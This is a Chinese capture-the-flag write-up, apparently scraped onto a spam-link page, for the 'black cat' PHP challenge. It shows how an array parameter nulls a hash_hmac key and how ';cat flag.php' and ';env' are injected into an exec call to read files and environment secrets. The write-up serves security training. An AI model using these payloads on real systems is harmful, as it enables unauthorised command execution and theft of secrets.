当前位置: 首页 > news >正文

辛集哪做网站什么是网站的功能模块

辛集哪做网站,什么是网站的功能模块,海南百度竞价排名,wordpress图片存储方案[羊城杯 2020]black cat 1 解题流程1.1 第一步1.2 第二步1.3 第三步 1 解题流程 1.1 第一步 打开网站有首歌,按F12也是提示听歌,ctf-wscan扫描就flag.php下载歌,用010打开,发现有一段内容if(empty($_POST[Black-Cat-Sheriff]) |…

[羊城杯 2020]black cat

  • 1 解题流程
    • 1.1 第一步
    • 1.2 第二步
    • 1.3 第三步

1

1 解题流程

1.1 第一步

  1. 打开网站有首歌,按F12也是提示听歌,ctf-wscan扫描就flag.php
  2. 下载歌,用010打开,发现有一段内容
    if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){die('Ë­£¡¾¹¸Ò²ÈÎÒÒ»Ö»¶úµÄβ°Í£¡');
    }
    $clandestine = getenv("clandestine");		//获取环境变量
    if(isset($_POST['White-cat-monitor']))$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);
    $hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);
    if($hh !== $_POST['Black-Cat-Sheriff']){die('ÓÐÒâÃé×¼£¬ÎÞÒâ»÷·¢£¬ÄãµÄÃÎÏë¾ÍÊÇÄãÒªÃé×¼µÄÄ¿±ê¡£ÏàÐÅ×Ô¼º£¬Äã¾ÍÊÇÄÇ¿ÅÉäÖаÐÐĵÄ×Óµ¯¡£');
    }
    echo exec("nc".$_POST['One-ear']);
    

1.2 第二步

  1. 这题要post这几个参数:Black-Cat-Sheriff、One-ear、White-cat-monitor
    这里有3个if,首先第一个肯定绕过;
          第二个if里面存在hash_hmac函数,只要我们传数组就能让盐是空,即第一次加密的clandestine是空
          第三个因为盐是空所以只有普通加密,Black-Cat-Sheriff传对应加密结果就行
    特性:MD5、sha特性是无法识别数组,只要是数组加密,就会变成null,所以White-cat-monitor采用数组绕过
  2. 最后一个if判断,编写一个脚本,生成加密结果
    <?php$hh = hash_hmac('sha256',';cat flag.php', null);echo $hh;
    ?>
    结果:04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6
    
  3. exec(‘nc’.) 这里拼接命令,如果直接传cat flag.php会变成 => exec('nc’cat flag.php)无法执行
    只要是系统命令的执行,可以通过;来拼接命令,所以one-ear=;cat flag.php => exec('nc';cat flag.php)

1.3 第三步

我先用ls ls …/ ls /等都没结果,考虑其他

  1. ?Black-Cat-Sheriff=83a52f8ff4e399417109312e0539c80147b5514586c45a6caeb3681ad9c1a395&One-ear=;dir&White-cat-monitor[]=1
    得到: Hei_Mao_Jing_Chang.mp3 flag.php index.php js scss
  2. Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&One-ear=;cat flag.php&White-cat-monitor[]=1
    得到: “GWHT{y0u_mu3t_p@y_atTentiou_!0_lt}”;
    提交后发现这个flag是错的
  3. 如果cat flag.php没出来,就cat /flag,或者env
    Black-Cat-Sheriff=afd556602cf62addfe4132a81b2d62b9db1b6719f83e16cce13f51960f56791b&One-ear=;env&White-cat-monitor[]=1
    得到:FLAG=flag{e325e53c-76d2-40b8-a41a-4dd88185afdb}
http://www.yayakq.cn/news/359548/

相关文章:

  • 沈阳网站优化建设建设网站的准备工作
  • 企业网站手机网站建设yy简历网
  • 备案期间网站能打开吗动态个人网站模板
  • 南宁网络建站手机频道
  • 商城网站欣赏富顺网站建设
  • 网站怎么放到服务器上做公司网站需要
  • 浏览器正能量不良网站免费中文网站模板html
  • 美食网站制作代码小公司建网站 优帮云
  • 系统网站建设ppt中企动力科技股份有限公司重庆分公司
  • 网站后期维护费用怎样版费个人网站不能放广告怎么赚钱
  • 以下属于网站页面设计的原则有石家庄网络平台推广
  • 微信网站建设方案专用车网站建设
  • 网站建设开发能力很强的企业广宁网站建设
  • 无锡万度网站建设广东省app开发公司
  • 前端做兼职网站邢台网站建设服务
  • 商城网站 价格设计公司名字怎么取
  • 牡丹江建设网站国家摄影网站
  • 软件开发网站建设维护哪个网站做简历免费
  • 设计接活的网站黑龙江网络科技有限公司
  • 搭建免费网站电子政务网站建设方案
  • 罗湖做网站的公司阜阳讯拓网站建设公司
  • 建设电子书阅读网站专用车网站建设哪家专业
  • 厦门网站建设外包免费看电视剧网站2020
  • 合肥网站专业制作常州网站搭建
  • 公司网站无法收录seo网站点击量排名优化
  • 做的好的微信商城网站安徽网站建设cnfg
  • 建门户网站需要多少钱WordPress怎么做百度小程序
  • 网站seo技术建设银行四川分行网站
  • 百度网盟 网站定向投放西安seo优化公司
  • 哪些网站是增值网文档生成器app